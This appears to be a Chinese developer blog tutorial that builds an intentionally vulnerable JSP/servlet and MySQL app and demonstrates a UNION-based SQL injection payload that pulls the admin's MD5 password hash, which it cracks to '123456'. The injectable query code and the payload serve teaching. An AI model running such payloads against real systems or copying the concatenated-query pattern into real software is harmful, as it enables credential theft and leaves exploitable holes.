jsp mysql 注入攻击实例
来源:互联网 发布:自由职业招聘软件 编辑:程序博客网 时间:2024/06/08 10:42
例子 要查询信息 并显示出来
SQL 信息表与admin表 插入信息 md5 加密的密码
CREATE TABLE `admin` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Name` varchar(40) NOT NULL, `Psw` varchar(100) NOT NULL, PRIMARY KEY (`Id`))ENGINE=InnoDB DEFAULT CHARSET=utf8;CREATE TABLE `info` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Info` varchar(40) NOT NULL, PRIMARY KEY (`Id`))ENGINE=InnoDB DEFAULT CHARSET=utf8;insert into info(`Info`) values('SQLinject');insert into admin(`Name`,`Psw`) values('admin','E10ADC3949BA59ABBE56E057F20F883E');
开始页---点击传参 --查询信息
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%><%String path = request.getContextPath();String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";%><!DOCTYPE HTML><html> <head> <base href="<%=basePath%>"> <title>SQL注入测试</title> </head> <body> <% String info="SQLinject"; %> <a href="Info?info=<%=info%>"> 查询info的信息 </a> </body></html>
查询servlet
package servlet;import javax.servlet.http.HttpServlet;import java.io.IOException;import javax.servlet.RequestDispatcher;import javax.servlet.ServletException;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import dal.infodal;import java.sql.*;public class info extends HttpServlet{ String ms="";@Override protected void service(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { //取得表单数据String info=""; if(req.getParameter("info")!=""&&req.getParameter("info").length()<100){ info=new String(req.getParameter("info").getBytes("ISO-8859-1"),"UTF-8");}else{ms+="info不正确"; } ResultSet rs=infodal.serchinfo(info);ms="信息查询成功";req.setAttribute("rs", rs);req.setAttribute("ms", ms);RequestDispatcher rd=req.getRequestDispatcher("inforesult.jsp");rd.forward(req,res);}}查询DAL
package dal;import java.sql.*;import constant.dbconstant;public class infodal {public static ResultSet serchinfo(String info){ String driverClass=dbconstant.getDriverclass(); String url=dbconstant.getUrl(); String dbUser = dbconstant.getDbuser(); String dbPwd = dbconstant.getDbpwd(); try{ Class.forName(driverClass); Connection con = DriverManager.getConnection(url,dbUser,dbPwd); Statement stmt=con.createStatement(); // String sql="select id,Info from info where Info='"+info+"'"; ResultSet rs=stmt.executeQuery(sql); return rs; }catch(Exception ex) { System.out.print("连接失败!!<br>"+ex.toString()); return null; } }}
显示查询信息
<%@ page language="java" import="java.util.*" import="java.sql.*"import="constant.dbconstant"pageEncoding="UTF-8"%><%String path = request.getContextPath();String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";%><!DOCTYPE HTML><html> <head> <base href="<%=basePath%>"> <title>SQL注入测试</title> </head> <body> <% ResultSet rs=(ResultSet)request.getAttribute("rs"); while(rs.next()){ %> <p> 查询的信息为: <%=rs.getInt("Id") %> </p> <br> <p> 查询的信息为: <%=rs.getString("Info") %> </p> <br><p> 查询的信息为: <%=rs.getNString(2) %> </p> <br> <%}%> <%String msg="";msg=(String)request.getAttribute("ms");if(msg==null){msg="";}else{request.removeAttribute("ms");}%><%=msg %> <script type="text/javascript">window.onload=function(){if("<%=msg%>"!=""){alert("<%=msg%>");//self.location="inforesult.jsp";}} </script> </body></html>
web.xml
<?xml version="1.0" encoding="UTF-8"?><web-app> <servlet> <servlet-name>Info</servlet-name> <servlet-class>servlet.info</servlet-class> </servlet> <servlet-mapping> <servlet-name>Info</servlet-name> <url-pattern>/Info</url-pattern> </servlet-mapping> </web-app>
以上为很常见的jsp过程 参数info 没有过滤 也没有参数化查询
注入语句
SQLinject' union select 2,Psw from admin where Name='admin
2 为常数 因为要对齐info 个数为2 int stirng
查询语句为
select Id,Info from Info where Info='SQLinject' union select 2,Psw from admin where Name='admin';
查询出来的信息为
info 的 Id Info 1 'SQLinject'
2 Psw 2 'E10ADC3949BA59ABBE56E057F20F883E'
E10ADC3949BA59ABBE56E057F20F883E 为md5密码 在线查询 123456
0 0
- jsp mysql 注入攻击实例
- SQL注入攻击实例
- JSP防SQL注入攻击
- 实例讲解SQL注入攻击
- 实例讲解 SQL 注入攻击
- 实例讲解 SQL 注入攻击
- 实例讲解 SQL 注入攻击
- 实例讲解SQL注入攻击
- 实例讲解 SQL 注入攻击
- Php+Mysql注入攻击详解
- PHP和MySQL注入攻击
- mysql防注入攻击解决办法
- PHP和MySQL注入攻击
- MySQL注入攻击与防御
- jsp防sql脚本注入攻击
- JSP如何防范SQL注入攻击
- JSP如何防范SQL注入攻击
- JSP如何防范SQL注入攻击
- 腾讯云批量部署服务器环境的方法
- 内排序-选择类排序-堆排序
- 前端速学成财:第十三课-实战演练:用gulp+EJS像CMS那样生成完整新闻内容面
- wrk(压测工具)源码笔记
- 《第一行代码》复习六BroadcastReceiver
- jsp mysql 注入攻击实例
- js判断undefined类型
- POJ 2553 The Bottom of a Graph(Tarjan Algorithm强连通分量)
- 微信和微信朋友圈分享
- Git初体验(5)-分支管理
- Android 画笔Paint
- JAVA (eclipse、jdk、tomcat)环境配置
- 【HDU】2094 - 产生冠军(拓扑 & STL)
- startActivityForResult总结